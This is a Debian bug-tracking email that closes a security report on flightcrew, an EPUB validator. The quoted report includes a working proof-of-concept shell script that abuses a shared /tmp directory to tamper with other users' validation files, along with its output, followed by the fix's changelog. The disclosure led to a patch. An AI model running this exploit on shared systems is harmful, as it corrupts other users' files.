Your message dated Mon, 15 May 2017 11:48:37 +0000
with message-id <e1daeup-0007om...@fasolo.debian.org>
and subject line Bug#861987: fixed in flightcrew 0.7.2+dfsg-9
has caused the Debian Bug report #861987,
regarding flightcrew: insecure use of /tmp
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
861987: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=861987
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: flightcrew
Version: 0.7.2+dfsg-8
Tags: security
flightcrew creates temporary files in /tmp/flightcrew/, even when this
directory belongs to another user. Malicious user could exploit this to tamper
with other users' temporary files; probably also to overwrite arbitrary files
via symlink attack.
I've attached proof-of-concept exploit. When it is running, all users will be
getting spurious validation errors:
$ whoami
jwilk
$ ls -ld /tmp/flightcrew/
drwxrwxrwx+ 3 mallory mallory 60 May 6 22:58 /tmp/flightcrew/
$ flightcrew-cli EpubValidates_Valid.epub
EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's
"version" attribute value needs to be "2.0", but is "
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
".
--
Jakub Wilk
#!/bin/sh
set -e -u
mkdir -m 777 /tmp/flightcrew
cd /tmp/flightcrew
setfacl -d -m "u:$USER:rwx" .
msg='
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
'
msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\</g' -e
's/$/\\\ /' | tr -d '\n')
while true
do
find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e
"s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true
done
--- End Message ---
--- Begin Message ---
Source: flightcrew
Source-Version: 0.7.2+dfsg-9
We believe that the bug you reported is fixed in the latest version of
flightcrew, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 861...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Mattia Rizzolo <mat...@debian.org> (supplier of updated flightcrew package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 15 May 2017 13:04:05 +0200
Source: flightcrew
Binary: flightcrew libflightcrew0v5 libflightcrew-dev
Architecture: source
Version: 0.7.2+dfsg-9
Distribution: unstable
Urgency: medium
Maintainer: Mattia Rizzolo <mat...@debian.org>
Changed-By: Mattia Rizzolo <mat...@debian.org>
Description:
flightcrew - C++ epub validator
libflightcrew-dev - C++ library development filesfor epub validation
libflightcrew0v5 - C++ library for epub validation
Closes: 861987
Changes:
flightcrew (0.7.2+dfsg-9) unstable; urgency=medium
.
* d/copyright: claim copyright for the 2017.
* Add patch to fix a security issue due to insecure use of /tmp.
Thanks to Jakub Wilk <jw...@jwilk.net> for the report and to
Thomas Pierson <cont...@thomaspierson.fr> for the patch.
Closes: #861987
Checksums-Sha1:
de0c8ab6deff107d14d03c0cdc8b13862f0a7434 2181 flightcrew_0.7.2+dfsg-9.dsc
e2d95f7ac081f55e2235d719858ae105f3885fa8 8472
flightcrew_0.7.2+dfsg-9.debian.tar.xz
fa51ef7d6fddad82f75d4c5927621fe3babf7dfb 14537
flightcrew_0.7.2+dfsg-9_amd64.buildinfo
Checksums-Sha256:
424f0c01be53f2a8b703ddac176f60b61b654aff368123500d0c5aef7545e12c 2181
flightcrew_0.7.2+dfsg-9.dsc
2791282aa0a1a7034c5e188dde73bc0413e688e5ec8473642973910e230f5746 8472
flightcrew_0.7.2+dfsg-9.debian.tar.xz
298637b4ca359bebd3593714e7538ae9e04a98ef7e830f7e36ede95819338dbb 14537
flightcrew_0.7.2+dfsg-9_amd64.buildinfo
Files:
2cc4c6d4bec122af0b574970572037cd 2181 text extra flightcrew_0.7.2+dfsg-9.dsc
2724903ce8e4d7d6faffd0ffbe5c3921 8472 text extra
flightcrew_0.7.2+dfsg-9.debian.tar.xz
60e17403ee310670ed370b2edc68a8bc 14537 text extra
flightcrew_0.7.2+dfsg-9_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEi3hoeGwz5cZMTQpICBa54Yx2K60FAlkZjuIACgkQCBa54Yx2
K61tKA//djxO7HJ88phZaaOrX8SgJI1fr5DyOX+//WnbexWmesFgDDMk6o8OiWu4
dfD2kdmQrGUgYoe+Q1kEBlOSe14PvP6GPlSxZcUYUU/kp1D9bpL5i1wOx9jLQ4lE
cZRzVXVIqMHsFbE7TjEC4skksasFnORdi/b0LOw1oPLNVyke4gSGD4okXQaEsLDU
PlBGkALTqfXxa0u10K/UJ8QGqyEwyM20W3xmIP4cVgiSIg0LOgmn7wcztF4SoiPl
M5vxXCxMMeOgsJTzwOyOiKruInI1OuZd0dhaCzkWtvQzGicUwWHauvv4HgkXRIh5
EAEoWhit1CNuA5fd53/00zTnlXyO85mpPCdndcbRztm+ZoiFQTSyTs9PvH6tH70h
35+5ldfMyna4H9KscuUCMLpBwZEX6ERIwoKWhjmd24pXJYzXmJ88xZjPwzHsb9EN
wH2uks+S2zsi6T8+lEvhA9svy+YCA0Scqvm+1S4q3VphsJx0bwg9C5LrXLwMKQ4Q
zRBVYduDIveCHjuZjyM5rJMKJm0MkyiP1IutZkwPtTzZwH8KFHXpncauzZC8yn+b
licyDGz3vmGXfcZ+/u2fZQHIGUJWPEVfReGBihYPlMcMARspGTrBGZa4BH4hiAa7
qIEnNFHWaWBuyroJUZdSSQTp4qhnrX8QbHgrLObhv5HzjOlMnpg=
=mLXT
-----END PGP SIGNATURE-----
--- End Message ---
